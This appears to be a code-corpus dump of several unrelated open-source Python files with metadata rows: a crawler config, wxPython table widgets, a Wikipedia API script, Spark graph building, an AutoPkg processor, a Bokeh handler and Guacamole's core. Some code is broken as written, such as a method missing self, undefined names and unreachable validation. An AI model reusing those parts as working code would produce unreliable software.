stroke_width = g.get_edge_data(*e)['w'] * 10,
stroke_opacity = 0.035,
stroke='grey')
if e[0] in mirnas and e[1] in mirna_genes: # mirnas to mirna-genes
h.connect(m2, e[0], -23,
g2, e[1], 23,
stroke_width=g.get_edge_data(*e)['w'] * 10,
stroke_opacity=0.035,
stroke="grey")
if e[1] in mirnas and e[0] in mirna_genes: # mirnas to mirna-genes
h.connect(m2, e[1], -23,
g2, e[0], 23,
stroke_width=g.get_edge_data(*e)['w'] * 10,
stroke_opacity=0.035,
stroke="grey")
print "saving"
h.save()
| gpl-3.0 | -6,586,333,391,598,297,000 | 26.968553 | 108 | 0.552732 | false | 2.954817 | false | false | false |
sivabalan/libSeek | Crawler4py/Config.py | 1 | 5985 | '''
@Author: Rohan Achar [email protected]
'''
import sys
from abc import *
class Config:
__metaclass__ = ABCMeta
def __init__(self):
#Number of Url Data Fetching Threads Allowed
self.MaxWorkerThreads = 8
#Timeout(Seconds) for trying to get the next url from the frontier.
self.FrontierTimeOut = 60
#Timeout(Seconds) for trying to get a free worker thread, (worker is taking too long maybe?)
self.WorkerTimeOut = 60
#Timeout(Seconds) for getting data from the output queue
self.OutBufferTimeOut = 60
#Timeout(Seconds) for getting data from a url
self.UrlFetchTimeOut = 2
#The User Agent String that this crawler is going to identify itself as. http://tools.ietf.org/html/rfc2616#section-14.43
self.__UserAgentString = None
#To allow resume of fetching from last point of closure. Set to False to always restart from seed set of urls.
self.Resumable = True
#Number of times to retry fetching a url if it fails
self.MaxRetryDownloadOnFail = 5
#PolitenessDelay that the crawler is forced to adhere to. http://en.wikipedia.org/wiki/Web_crawler#Politeness_policy
self.PolitenessDelay = 300
#The Persistent File to store current state of crawler for resuming (if Resumable is True)
self.PersistentFile = "Persistent.shelve"
#Total (Approximate) documents to fetch before stopping
self.NoOfDocToFetch = -1
#The Max Depth of the page to go to while fetching (depth = distance of first discovery from seed urls)
self.MaxDepth = -1
#Max size of page in bytes that is allowed to be fetched. (Only works for websites that send Content-Length in response header)
self.MaxPageSize = 1048576
#Max size of output queue. If the HandleData function is slow, then output buffer might not clear up fast.
#This enforces that the queue does not go beyond a certain size.
#Set to 0 if you want unlimited size
#Advantages of setting > 0: Fetch url waits for the buffer to become free when its full. If crawler crashes max of this size output is lost.
#Disadvantage of setting > 0: Slows down the crawling.
self.MaxQueueSize = 0
#This ignores the rules at robot.txt. Be very careful with this. Only make it True with permission of the host/API pulling that does not need robot rules.
self.IgnoreRobotRule = False
#This sets the mode of traversal: False -> Breadth First, True -> Depth First.
self.DepthFirstTraversal = False
def ValidateConfig(self):
'''Validates the config to see if everything is in order. No need to extend this'''
try:
assert (self.UserAgentString != "" or self.UserAgentString != "Set This Value!")
except AssertionError:
print ("Set value of UserAgentString")
sys.exit(1)
try:
assert (self.MaxWorkerThreads != 0)
except AssertionError:
print ("MaxWorkerThreads cannot be 0")
sys.exit(1)
@abstractmethod
def GetSeeds(self):
'''Returns the first set of urls to start crawling from'''
return ["Sample Url 1", "Sample Url 2", "Etc"]
@abstractmethod
def HandleData(self, parsedData):
'''Function to handle url data. Guaranteed to be Thread safe.
parsedData = {"url" : "url", "text" : "text data from html", "html" : "raw html data"}
Advisable to make this function light. Data can be massaged later. Storing data probably is more important'''
print (parsedData["url"])
pass
def AllowedSchemes(self, scheme):
'''Function that allows the schemes/protocols in the set.'''
return scheme.lower() in set(["http", "https", "ftp", b"http", b"https", b"ftp"])
@abstractmethod
def ValidUrl(self, url):
'''Function to determine if the url is a valid url that should be fetched or not.'''
return True
parsed = urlparse(url)
try:
return ".ics.uci.edu" in parsed.hostname.decode("utf-8") \
and not re.match(".*\.(css|js|bmp|gif|jpe?g|ico|png|tiff?|mid|mp2|mp3|mp4)$", parsed.path.decode("utf-8"))
except TypeError:
print ("TypeError for ", parsed)
def GetTextData(self, htmlData):
'''Function to clean up html raw data and get the text from it. Keep it small.
Not thread safe, returns an object that will go into the parsedData["text"] field for HandleData function above'''
import nltk
return nltk.clean_html(htmlData)
def ExtractNextLinks(self, url, rawData, outputLinks):
'''Function to extract the next links to iterate over. No need to validate the links. They get validated at the ValudUrl function when added to the frontier
Add the output links to the outputLinks parameter (has to be a list). Return Bool signifying success of extracting the links.
rawData for url will not be stored if this function returns False. If there are no links but the rawData is still valid and has to be saved return True
Keep this default implementation if you need all the html links from rawData'''
from lxml import html,etree
try:
htmlParse = html.document_fromstring(rawData)
htmlParse.make_links_absolute(url)
except etree.ParserError:
return False
except etree.XMLSyntaxError:
return False
for element, attribute, link, pos in htmlParse.iterlinks():
outputLinks.append(link)
return True
def GetAuthenticationData(self):
''' Function that returns dict(top_level_url : tuple(username, password)) for basic authentication purposes'''
return {} | mit | -5,894,861,468,316,400,000 | 42.348148 | 164 | 0.643776 | false | 4.349564 | false | false | false |
GeoDaCenter/CAST | stars/visualization/DataWidget.py | 1 | 13281 | """
"""
__author__ = "Xun Li <[email protected]>"
__all__ = ['DataListCtrl','DataTablePanel','DataWidget']
import sys
import wx
import wx.lib.mixins.listctrl as listmix
import wx.grid as gridlib
import stars
from stars.model import *
from stars.visualization.EventHandler import *
from stars.visualization.AbstractWidget import *
from stars.visualization.AbstractCanvas import AbstractCanvas
class DataGrid(wx.grid.Grid):
def __init__(self, parent, dbf):
wx.grid.Grid.__init__(self, parent, -1)
self.dbf = dbf
n_cols = len(dbf.header)
n_rows = dbf.n_records
self.CreateGrid(n_rows, n_cols)
raw_dbf_data = []
for i in range(n_rows):
row_data = dbf.read_record(i)
for j in range(n_cols):
self.SetCellValue(i,j, str(row_data[j]))
raw_dbf_data.append(row_data)
self.dbf.records = raw_dbf_data
for i in range(n_cols):
self.SetColLabelValue(i, dbf.header[i])
self.Bind(wx.EVT_IDLE, self.OnIdle)
def OnIdle(self, event):
pass
class DataTablePanel1(wx.Panel, AbstractCanvas):
"""
Panel displaying dbf DataTable.
The wxPanel container for DataList (wx.ListCtrl).
"""
def __init__(self, parent, shapefileObject, name):
wx.Panel.__init__(self, parent, -1, style=wx.WANTS_CHARS)
from stars.visualization.maps.BaseMap import PolygonLayer, PointLayer, LineLayer
self.layer = shapefileObject
self.dbf = self.layer.dbf
self.name = name
self.parent = parent
self.current_selected = {} # {id: centroid}
self.isEvtHandle = False
self.table = DataGrid(self, self.dbf)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.table, 1, wx.EXPAND)
if self.layer.shape_type == stars.SHP_POINT:
self.draw_layer = PointLayer(self,self.layer)
elif self.layer.shape_type == stars.SHP_LINE:
self.draw_layer = LineLayer(self, self.layer)
elif self.layer.shape_type == stars.SHP_POLYGON:
self.draw_layer = PolygonLayer(self,self.layer)
self.SetSizer(sizer)
self.SetAutoLayout(True)
# table events
#self.table.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnItemSelected)
#self.table.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.OnItemDeselected)
# register event_handler to THE OBSERVER
while parent != None:
if isinstance(parent, stars.Main):
self.observer = parent.observer
parent = parent.GetParent()
self.Register(stars.EVT_OBJS_SELECT, self.OnRecordsSelect)
self.Register(stars.EVT_OBJS_UNSELECT, self.OnNoRecordSelect)
self.parent.Bind(wx.EVT_CLOSE, self.OnClose) # OnClose Only send to Frame/Dialog
def OnClose(self, event):
self.Unregister(stars.EVT_OBJS_SELECT, self.OnRecordsSelect)
self.Unregister(stars.EVT_OBJS_UNSELECT, self.OnNoRecordSelect)
event.Skip()
def OnRecordsSelect(self, event):
pass
def OnNoRecordSelect(self, event):
pass
class DataListCtrl(wx.ListCtrl):
"""
Virtual ListCtrl for fast display on large DBF file
"""
def __init__(self, parent, ID, dbf, pos=wx.DefaultPosition,
size=wx.DefaultSize, style=wx.LC_REPORT|wx.LC_VIRTUAL|wx.LC_HRULES|wx.LC_VRULES):
wx.ListCtrl.__init__(self, parent, ID, pos, size, style)
self.dbf = dbf
self.SetItemCount(dbf.n_records)
n_columns = len(dbf.header)
self.InsertColumn(0, "")
for i,item in enumerate(dbf.header):
self.InsertColumn(i+1, item)
self.il = wx.ImageList(16,16)
open_bmp = wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN, wx.ART_TOOLBAR, (16,16))
self.idx1 = self.il.Add(open_bmp)
self.SetImageList(self.il,wx.IMAGE_LIST_NORMAL)
def OnGetItemText(self, item, col):
if col == 0: return str(item+1)
#return self.dbf.read_record(item)[col]
return self.dbf.read_record(item)[col-1]
class DataTablePanel(wx.Panel, AbstractCanvas,listmix.ColumnSorterMixin):
"""
Panel displaying dbf DataTable.
The wxPanel container for DataList (wx.ListCtrl).
"""
def __init__(self, parent, shapefileObject, name):
wx.Panel.__init__(self, parent, -1, style=wx.WANTS_CHARS)
from stars.visualization.maps.BaseMap import PolygonLayer, PointLayer, LineLayer
self.layer = shapefileObject
self.dbf = self.layer.dbf
self.name = name
self.parent = parent
self.current_selected = {} # {id: centroid}
self.isEvtHandle = False
tID = wx.NewId()
self.table = DataListCtrl(
self,
tID,
self.dbf,
style=wx.LC_REPORT
| wx.LC_VIRTUAL
#| wx.BORDER_SUNKEN
| wx.BORDER_NONE
| wx.LC_EDIT_LABELS
#| wx.LC_SORT_ASCENDING
#| wx.LC_NO_HEADER
| wx.LC_VRULES
| wx.LC_HRULES
#| wx.LC_SINGLE_SEL
)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.table, 1, wx.EXPAND)
if self.layer.shape_type == stars.SHP_POINT:
self.draw_layer = PointLayer(self,self.layer)
elif self.layer.shape_type == stars.SHP_LINE:
self.draw_layer = LineLayer(self, self.layer)
elif self.layer.shape_type == stars.SHP_POLYGON:
self.draw_layer = PolygonLayer(self,self.layer)
self.SetSizer(sizer)
self.SetAutoLayout(True)
# table events
self.table.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnItemSelected)
self.table.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.OnItemDeselected)
# register event_handler to THE OBSERVER
while parent != None:
if isinstance(parent, stars.Main):
self.observer = parent.observer
parent = parent.GetParent()
self.Register(stars.EVT_OBJS_SELECT, self.OnRecordsSelect)
self.Register(stars.EVT_OBJS_UNSELECT, self.OnNoRecordSelect)
self.parent.Bind(wx.EVT_CLOSE, self.OnClose) # OnClose Only send to Frame/Dialog
def OnClose(self, event):
self.Unregister(stars.EVT_OBJS_SELECT, self.OnRecordsSelect)
self.Unregister(stars.EVT_OBJS_UNSELECT, self.OnNoRecordSelect)
event.Skip()
def update_table(self, dbf):
"""
Get and display data from dbf File on DataList (wx.ListCtrl)
"""
self.table.ClearAll()
self.table.SetItemCount(dbf.n_records)
n_columns = len(dbf.header)
self.table.InsertColumn(0, "ID")
for i,item in enumerate(dbf.header):
self.table.InsertColumn(i+1, item)
def OnItemSelected(self, event):
if self.isEvtHandle == False:
# prevent backforce Event
if self.table.SelectedItemCount == 1:
self.current_selected = {}
if not self.current_selected.has_key(event.m_itemIndex):
dummy_region = []
# find centroid of current_select objec
if self.layer.shape_type == stars.SHP_POLYGON:
centroids = self.layer.centroids[event.m_itemIndex]
for centroid in centroids:
dummy_region += centroid + centroid
else:
point = list(self.layer.shape_objects[event.m_itemIndex])
dummy_region = point + point
self.current_selected[event.m_itemIndex] = dummy_region
# trigger Upadte Event to notify other
# widgets to drawing the selected items
self.OnRecordsSelect(None)
event.Skip()
def OnItemDeselected(self, event):
if self.isEvtHandle == False:
# prevent backforce Event
if self.current_selected.has_key(event.m_itemIndex):
self.current_selected.pop(event.m_itemIndex)
# trigger Upadte Event to notify other
# widgets to drawing the selected items
self.OnRecordsSelect(None)
event.Skip()
def unhighlight_selected(self):
for item in self.current_selected:
self.table.SetItemState(item, 0, wx.LIST_STATE_SELECTED)# | wx.LIST_STATE_FOCUSED)
def highlight_selected(self):
if len(self.current_selected) > 0:
first = self.current_selected.keys()[0]
for item in self.current_selected:
if item == first:
self.table.EnsureVisible(item)
self.table.SetItemState(item, wx.LIST_STATE_SELECTED, wx.LIST_STATE_SELECTED)#|wx.LIST_STATE_FOCUSED)
#------------------------------
# Belows are Event handlers
#------------------------------
def OnRecordsSelect(self, event):
if event == None:
# trigger other widgets
data = AbstractData(self)
data.shape_ids[self.name] = self.current_selected.keys()
data.boundary = self.current_selected.values()
self.UpdateEvt(stars.EVT_OBJS_SELECT, data)
else:
# trigged by other widgets
self.isEvtHandle = True
data = event.data
if data.shape_ids.has_key(self.name):
# unselect first
self.unhighlight_selected()
# then select trigged
selected_id_list = data.shape_ids[self.name]
self.current_selected = {}
for i in selected_id_list:
self.current_selected[i] = None
self.highlight_selected()
else:
# unselect first
self.unhighlight_selected()
self.current_selected = {}
# try to test if query regions can be used
# to find shape ids
query_regions = data.boundary
if query_regions == None or len(query_regions) == 0:
pass
else:
if isinstance(query_regions[0], float):
query_regions = [query_regions]
for region in query_regions:
shape_ids, query_region = self.draw_layer.get_selected_by_region(None, region)
for id in shape_ids:
self.current_selected[id] = None
self.highlight_selected()
self.isEvtHandle = False
def OnNoRecordSelect(self, event):
self.isEvtHandle = True
for item in self.current_selected:
self.table.SetItemState(item, 0, wx.LIST_STATE_SELECTED)# | wx.LIST_STATE_FOCUSED)
self.isEvtHandle = False
class DataWidget(AbstractWidget):
"""
Widget for displaying dbf table, the layout should be like this:
-------------------------
| toolbar |
--------------------------
| |
| |
| Table |
| |
| |
--------------------------
"""
def __init__(self, parent, shp, name):
self.shp= shp
self.name = name
AbstractWidget.__init__(self, parent, self.name, pos=(60, 60), size=(600, 350))
#self.toolbar = self._create_toolbar()
#self.SetToolBar(self.toolbar)
#self.toolbar.Realize()
self.status_bar = self.CreateStatusBar()
self.data_table = DataTablePanel(self,self.shp,self.name)
self.canvas = self.data_table
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.data_table, 1, wx.EXPAND)
self.SetSizer(sizer)
self.SetAutoLayout(True)
def _create_toolbar(self):
tsize = (16,16)
toolbar = self.CreateToolBar()
open_bmp = wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN, wx.ART_TOOLBAR, tsize)
close_bmp = wx.ArtProvider.GetBitmap(wx.ART_FOLDER, wx.ART_TOOLBAR, tsize)
toolbar.AddLabelTool(1001, "Filter Data", open_bmp)
toolbar.AddLabelTool(1002, "Close", close_bmp)
toolbar.EnableTool(1002, False)
self.Bind(wx.EVT_TOOL, self.OnFilterData, id=1001)
return toolbar
def OnFilterData(self,event):
frame = SpaceTimeQuery(self.data_table, "SpaceTime Query", self.dbf)
frame.Show()
| gpl-3.0 | -3,815,400,464,194,120,700 | 36.178161 | 118 | 0.542354 | false | 3.947979 | false | false | false |
nik7273/computational-medical-knowledge | Area 51/TestingWikiAPIProperties.py | 2 | 1571 | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 30 19:08:33 2014
@author: Nik
"""
import json, requests, sys, codecs, nltk
from HTMLParser import HTMLParser
#function to strip html tags: taken from http://stackoverflow.com/questions/753052/strip-html-from-strings-in-python
"""class MLStripper(HTMLParser):
def __init__(self):
self.reset()
self.fed = []
def handle_data(self, d):
self.fed.append(d)
def get_data(self):
return ''.join(self.fed)
def strip_tags(html):
s = MLStripper()
s.feed(html)
return s.get_data()"""
# Checks title for spacing so that the space can be replaced with an underscore in the parameters for the URL. sys.argv[1]
# is used so PATH variable isn't put into parameters for URL
title = sys.argv[1]
x = title.replace(" ", "_") if " " in title else title
#Parameters to be passed into the url
parameters = {'format' : 'json', 'action' : 'query', 'titles' : x, 'prop' : 'revisions', 'rvprop' : 'ids', 'continue' : '', 'rvlimit' : '10'}
#getting the content of the url
r = requests.get('http://en.wikipedia.org/w/api.php', params=parameters)
#turning that content into json and loading it
data = r.json()
#writing json content to file
with open('testedRevData.json', 'w') as outfile:
json.dump(data, outfile)
#writing plaintext to file
"""with codecs.open('testedRevData.txt', 'w', 'utf-8') as file2:
ids = data['query']['pages'].keys()
text = ' '.join([data['query']['pages'][idx]['extract'] for idx in ids])
text = strip_tags(text)
file2.write(text)"""
| apache-2.0 | -4,330,702,046,418,340,400 | 28.092593 | 141 | 0.651178 | false | 3.259336 | false | false | false |
mssalvador/WorkflowCleaning | semisupervised/labelpropagation/lp_generate_graph.py | 1 | 2509 | import pyspark.ml.linalg as ml_linalg
from pyspark.mllib.linalg.distributed import MatrixEntry
from pyspark.ml import feature
from pyspark.sql.functions import udf
import numpy as np
def _compute_bfs(vec_1, vec_2, sigma=0.42):
return np.exp(-vec_1.squared_distance(vec_2) / sigma ** 2)
def _tolerance_cut(value, tol=10e-10):
if value <= tol:
return 0
else:
return value
def _to_dense(x):
try:
return ml_linalg.DenseVector(x.toArray())
except Exception as e:
print(e)
return x
def _make_feature_vector(df, feature_col=None):
return 'features', feature.VectorAssembler(inputCols=feature_col, outputCol='features').transform(df)
def _scale_data_frame(df, vector=None):
if vector:
df = df.withColumn(vector, udf(_to_dense, ml_linalg.VectorUDT())(vector))
scale = feature.StandardScaler(
withMean=True, withStd=True,
inputCol=vector, outputCol='std_vector')
model = scale.fit(df)
return (model
.transform(df)
.select([i for i in df.columns if i != vector] + [scale.getOutputCol()])
.withColumnRenamed(existing=scale.getOutputCol(), new=vector))
def do_cartesian(sc, df, id_col=None, feature_col=None, **kwargs):
import functools
sigma = kwargs.get('sigma', 0.42)
tol = kwargs.get('tol', 10e-10)
standardize = kwargs.get('standardize', True)
if isinstance(feature_col, list):
feature_col, scaled_df = _make_feature_vector(df=df, feature_col=feature_col)
if standardize:
scaled_df = _scale_data_frame(scaled_df, vector=feature_col)
if id_col:
vector_dict = scaled_df.select(id_col, feature_col).rdd.collectAsMap()
else:
vector_dict = (scaled_df.select(feature_col)
.rdd.zipWithIndex().map(lambda x: (x[1], x[0][feature_col]))
.collectAsMap())
bc_vec = sc.broadcast(vector_dict)
index_rdd = df.rdd.map(lambda x: x[id_col]).cache()
bfs = functools.partial(_compute_bfs)
cartesian_demon = index_rdd.cartesian(index_rdd).filter(lambda x: x[0] >= x[1])
cartesian_distance_demon = cartesian_demon.map(
lambda x: MatrixEntry(x[0], x[1], bfs(
vec_1=bc_vec.value.get(x[0]),
vec_2=bc_vec.value.get(x[1]),
sigma=sigma))
)
index_rdd.unpersist() # Memory cleanup!
tol_cut = functools.partial(_tolerance_cut, tol=tol)
return cartesian_distance_demon.filter(lambda x: tol_cut(x.value))
| apache-2.0 | -6,512,979,471,076,784,000 | 32.013158 | 105 | 0.637704 | false | 3.229086 | false | false | false |
fabien-michel/mosen-recipes | Processors/FlatPkgVersioner.py | 1 | 4455 | # !/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Basically copied line for line and adapted from Greg Neagle's Munki project.
# See: https://github.com/munki/munki/blob/master/code/client/munkilib/munkicommon.py#L1507
import os
import tempfile
import subprocess
import shutil
from glob import glob
from autopkglib import ProcessorError
from DmgMounter import DmgMounter
__all__ = ["FlatPkgVersioner"]
class FlatPkgVersioner(DmgMounter):
description = ("Expands PackageInfo and Distribution information from a flat package using xar,"
"then parses version information")
input_variables = {
"flat_pkg_path": {
"required": True,
"description": ("Path to a flat package. "
"Can point to a globbed path inside a .dmg which will "
"be mounted."),
}
}
output_variables = {
"version": {
"description": "Version of the item.",
},
}
source_path = None
def main(self):
# Check if we're trying to copy something inside a dmg.
(dmg_path, dmg, dmg_source_path) = self.env[
'flat_pkg_path'].partition(".dmg/")
dmg_path += ".dmg"
try:
if dmg:
# Mount dmg and copy path inside.
mount_point = self.mount(dmg_path)
self.source_path = glob(
os.path.join(mount_point, dmg_source_path))[0]
else:
# Straight copy from file system.
self.source_path = self.env['flat_pkg_path']
infoarray = self.getFlatPackageInfo(self.source_path)
self.output("Unpacked %s to %s"
% (self.source_path, self.env['destination_path']))
finally:
if dmg:
self.unmount(dmg_path)
def getFlatPackageInfo(pkgpath):
"""
returns array of dictionaries with info on subpackages
contained in the flat package
"""
infoarray = []
# get the absolute path to the pkg because we need to do a chdir later
abspkgpath = os.path.abspath(pkgpath)
# make a tmp dir to expand the flat package into
pkgtmp = tempfile.mkdtemp(dir=tmpdir)
# record our current working dir
cwd = os.getcwd()
# change into our tmpdir so we can use xar to unarchive the flat package
os.chdir(pkgtmp)
cmd = ['/usr/bin/xar', '-xf', abspkgpath, '--exclude', 'Payload']
proc = subprocess.Popen(cmd, bufsize=-1, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(unused_output, err) = proc.communicate()
if proc.returncode == 0:
currentdir = pkgtmp
packageinfofile = os.path.join(currentdir, 'PackageInfo')
if os.path.exists(packageinfofile):
infoarray = parsePkgRefs(packageinfofile)
if not infoarray:
# found no PackageInfo file
# so let's look at the Distribution file
distributionfile = os.path.join(currentdir, 'Distribution')
if os.path.exists(distributionfile):
infoarray = parsePkgRefs(distributionfile, path_to_pkg=pkgpath)
if not infoarray:
# No PackageInfo file or Distribution file
# look for subpackages at the top level
for item in listdir(currentdir):
itempath = os.path.join(currentdir, item)
if itempath.endswith('.pkg') and os.path.isdir(itempath):
packageinfofile = os.path.join(itempath, 'PackageInfo')
if os.path.exists(packageinfofile):
infoarray.extend(parsePkgRefs(packageinfofile))
else:
raise ProcessorError(err)
# change back to original working dir
os.chdir(cwd)
shutil.rmtree(pkgtmp)
return infoarray
if __name__ == '__main__':
processor = FlatPkgVersioner()
processor.execute_shell() | mit | 6,184,062,797,420,564,000 | 35.52459 | 100 | 0.618406 | false | 4.02439 | false | false | false |
htygithub/bokeh | bokeh/server/views/doc_handler.py | 2 | 3186 | ''' Provide a request handler that returns a page displaying a document.
'''
from __future__ import absolute_import, print_function
import logging
log = logging.getLogger(__name__)
import hashlib
import random
import time
from tornado.web import RequestHandler
from bokeh.embed import server_html_page_for_session
from bokeh.settings import settings
# Use the system PRNG for session id generation (if possible)
# NOTE: secure random string generation implementation is adapted
# from the Django project. Reference:
# https://github.com/django/django/blob/0ed7d155635da9f79d4dd67e4889087d3673c6da/django/utils/crypto.py
try:
random = random.SystemRandom()
using_sysrandom = True
except NotImplementedError:
import warnings
warnings.warn('A secure pseudo-random number generator is not available '
'on your system. Falling back to Mersenne Twister.')
using_sysrandom = False
def get_random_string(length=36,
allowed_chars='abcdefghijklmnopqrstuvwxyz'
'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'):
"""
Return a securely generated random string.
The default length of 12 with the a-z, A-Z, 0-9 character set returns
a 71-bit value. log_2((26+26+10)^12) =~ 71 bits
"""
if not using_sysrandom:
# This is ugly, and a hack, but it makes things better than
# the alternative of predictability. This re-seeds the PRNG
# using a value that is hard for an attacker to predict, every
# time a random string is required. This may change the
# properties of the chosen random sequence slightly, but this
# is better than absolute predictability.
random.seed(
hashlib.sha256(
("%s%s%s" % (
random.getstate(),
time.time(),
settings.SECRET_KEY)).encode('utf-8')
).digest())
return ''.join(random.choice(allowed_chars) for i in range(length))
class DocHandler(RequestHandler):
''' Implements a custom Tornado handler for document display page
'''
def __init__(self, tornado_app, *args, **kw):
self.application_context = kw['application_context']
self.bokeh_websocket_path = kw['bokeh_websocket_path']
# Note: tornado_app is stored as self.application
super(DocHandler, self).__init__(tornado_app, *args, **kw)
def initialize(self, *args, **kw):
pass
def get(self, *args, **kwargs):
session_id = self.get_argument("bokeh-session-id", default=None)
if session_id is None:
session_id = get_random_string()
session = self.application_context.create_session_if_needed(session_id)
websocket_url = self.application.websocket_url_for_request(self.request, self.bokeh_websocket_path)
page = server_html_page_for_session(session_id, self.application.resources(self.request),
title=session.document.title,
websocket_url=websocket_url)
self.set_header("Content-Type", 'text/html')
self.write(page)
| bsd-3-clause | 2,699,243,066,116,979,700 | 37.853659 | 109 | 0.644696 | false | 4.159269 | false | false | false |
zyga/guacamole | guacamole/core.py | 1 | 10843 | # encoding: utf-8
# This file is part of Guacamole.
#
# Copyright 2012-2015 Canonical Ltd.
# Written by:
# Zygmunt Krynicki <[email protected]>
#
# Guacamole is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License version 3,
# as published by the Free Software Foundation.
#
# Guacamole is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Guacamole. If not, see <http://www.gnu.org/licenses/>.
"""
The essence of guacamole.
This module defines the three essential core classes: :class:`Ingredient`,
:class:`Bowl`, :class:`Context`. All of those have stable APIs.
"""
from __future__ import absolute_import, print_function, unicode_literals
import logging
import sys
__all__ = (
'Bowl',
'Context',
'Ingredient',
)
_logger = logging.getLogger('guacamole')
class Ingredient(object):
"""
Part of guacamole.
Ingredients are a mechanism for inserting functionality into Guacamole.
The sequence of calls to ingredient methods is as follows:
- :meth:`added()`
The added method is where an ingredient can advertise itself to other
ingredients that it explicitly collaborates with.
- :meth:`preparse()`
The preparse method is where ingredients can have a peek at the command
line arguments. This can serve to optimize further actions. Essentially
guacamole allows applications to parse arguments twice and limit the
actions needed to do that correctly to the essential minimum required.
- :meth:`early_init()`
The early initialization method can be used to do additional
initialization. It can take advantage of the fact that the whole command
line arguments are now known and may have been analyzed further by the
preparse method.
- :meth:`parse()`
The parse method is where applications are expected to fully understand
command line arguments. This method can abort subsequent execution if
arguments are wrong in in some way. After parsing command line arguments
the application should be ready for execution.
- :meth:`late_init()`
The late initialization method mimics the early initialization method but
is called after parsing all of the command line arguments. Again, it can be
used to prepare addiotional resources necessary for a given application.
- :meth:`dispatch()`
The dispatch method is where applications execute the bulk of their
actions. Dispatching is typically done with one of the standard
ingredients which will locate the appropriate method to call into the
application.
Depending on the outcome of the dispatch (if an exception is raised or not)
one of :meth:`dispatch_succeeded()`` or :meth:`dispatch_failed()` is
called.
- :meth:`shutdown()`
This is the last method called on all ingredients.
Each of those methods is called with a context argument
(:class:`Context:`). A context is a free-for-all environment where
ingredients can pass data around. There is no name-spacing. Ingredients
should advertise what they do with the context and what to expect.
"""
def __str__(self):
"""
Get the string representation of this ingredient.
The string method just returns the class name. Since the ingredient is
an implemenetation detail it does not have anything that applications
should show to the user.
"""
return self.__class__.__name__
def added(self, context):
"""Ingredient method called before anything else."""
def build_early_parser(self, context):
"""Ingredient method called to build the early parser."""
def preparse(self, context):
"""Ingredient method called to pre-parse command line aruments."""
def early_init(self, context):
"""Ingredient method for early initialization."""
def build_parser(self, context):
"""Ingredient method called to build the full parser."""
def parse(self, context):
"""Ingredient method called to parse command line arguments."""
def late_init(self, context):
"""Ingredient method for late initialization."""
def dispatch(self, context):
"""
Ingredient method for dispatching (execution).
.. note::
The first ingredient that implements this method and returns
something other than None will stop command dispatch!
"""
def dispatch_succeeded(self, context):
"""Ingredient method called when dispatching is correct."""
def dispatch_failed(self, context):
"""Ingredient method called when dispatching fails."""
def shutdown(self, context):
"""Ingredient method called after all other methods."""
class Context(object):
"""
Context for making guacamole with ingredients.
A context object is created and maintained throughout the life-cycle of an
executing tool. A context is passed as argument to all ingredient methods.
Since context has no fixed API anything can be stored and loaded.
Particular ingredients document how they use the context object.
"""
def __repr__(self):
"""
Get a debugging string representation of the context.
The debugging representation shows all of the *names* of objects added
to the context by various ingredients. Since the actual object can have
large and complex debugging representation containing that
representation was considered as a step against understanding what is
in the context.
"""
return "<Context {{{}}}>".format(
', '.join(sorted(self.__dict__.keys())))
class Bowl(object):
"""
A vessel for preparing guacamole out of ingredients.
.. note::
Each Bowl is single-use. If you eat it you need to get another one as
this one is dirty and cannot be reused.
"""
def __init__(self, ingredients):
"""Prepare a guacamole out of given ingredients."""
self.ingredients = ingredients
self.context = Context()
self.context.bowl = self
self.context.spices = set()
def add_spice(self, spice):
"""
Add a single spice the bowl.
"""
self.context.spices.add(spice)
def has_spice(self, spice):
"""
Check if a given spice is being used.
This method can be used to construct checks if an optional ingredient
feature should be enabled or not. Spices are simply strings that
describe optional features.
"""
return spice in self.context.spices
def eat(self, argv=None):
"""
Eat the guacamole.
:param argv:
Command line arguments or None. None means that sys.argv is used
:return:
Whatever is returned by the first ingredient that agrees to perform
the command dispatch.
The eat method is called to run the application, as if it was invoked
from command line directly.
"""
# The setup phase, here KeyboardInterrupt is a silent sign to exit the
# application. Any error that happens here will result in a raw
# backtrace being printed to the user.
try:
self.context.argv = argv
self._added()
self._build_early_parser()
self._preparse()
self._early_init()
self._build_parser()
self._parse()
self._late_init()
except KeyboardInterrupt:
self._shutdown()
return
# The execution phase. Here we differentiate SystemExit from all other
# exceptions. SystemExit is just re-raised as that's what any piece of
# code can raise to ask to exit the currently running application. All
# other exceptions are recorded in the context and the failure-path of
# the dispatch is followed. In other case, when there are no
# exceptions, the success-path is followed. In both cases, ingredients
# are shut down.
try:
return self._dispatch()
except SystemExit:
raise
except BaseException:
(self.context.exc_type, self.context.exc_value,
self.context.traceback) = sys.exc_info()
self._dispatch_failed()
else:
self._dispatch_succeeded()
finally:
self._shutdown()
def _added(self):
"""Run the added() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.added(self.context)
def _build_early_parser(self):
"""Run build_early_parser() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.build_early_parser(self.context)
def _preparse(self):
"""Run the peparse() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.preparse(self.context)
def _early_init(self):
"""Run the early_init() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.early_init(self.context)
def _build_parser(self):
"""Run build_parser() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.build_parser(self.context)
def _parse(self):
